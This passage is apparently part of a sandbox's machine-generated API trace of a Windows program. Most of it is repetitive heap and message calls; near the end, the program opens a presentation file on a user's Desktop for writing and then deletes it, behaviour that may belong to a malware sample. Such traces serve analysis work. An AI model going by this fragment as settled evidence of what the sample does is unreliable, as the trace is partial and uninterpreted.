hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.714] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0158.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.715] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.715] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0158.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.717] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.718] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.718] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.719] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0158.719] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dbszqxeh.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0158.720] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.720] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.720] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.720] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.720] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0158.721] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.721] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.721] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.721] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.721] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.721] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.721] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.722] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0158.722] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.722] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.722] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.722] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.722] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.722] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.722] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.722] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps", lpFilePart=0x0) returned 0x32 [0158.723] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb59a9e50, ftCreationTime.dwHighDateTime=0x1d5d983, ftLastAccessTime.dwLowDateTime=0x6bc54d10, ftLastAccessTime.dwHighDateTime=0x1d5de75, ftLastWriteTime.dwLowDateTime=0x4155620, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xf73d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="DBSZqxeH.pps", cAlternateFileName="")) returned 0x90af58 [0158.723] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dbszqxeh.pps")) returned 1 [0158.726] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb59a9e50, ftCreationTime.dwHighDateTime=0x1d5d983, ftLastAccessTime.dwLowDateTime=0x6bc54d10, ftLastAccessTime.dwHighDateTime=0x1d5de75, ftLastWriteTime.dwLowDateTime=0x4155620, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xf73d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="DBSZqxeH.pps", cAlternateFileName="")) returned 0 [0158.726] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0158.727] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.728] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0158.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0158.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0158.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0158.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0158.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0158.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0158.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0158.728] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0158.728] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0158.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0158.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0158.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 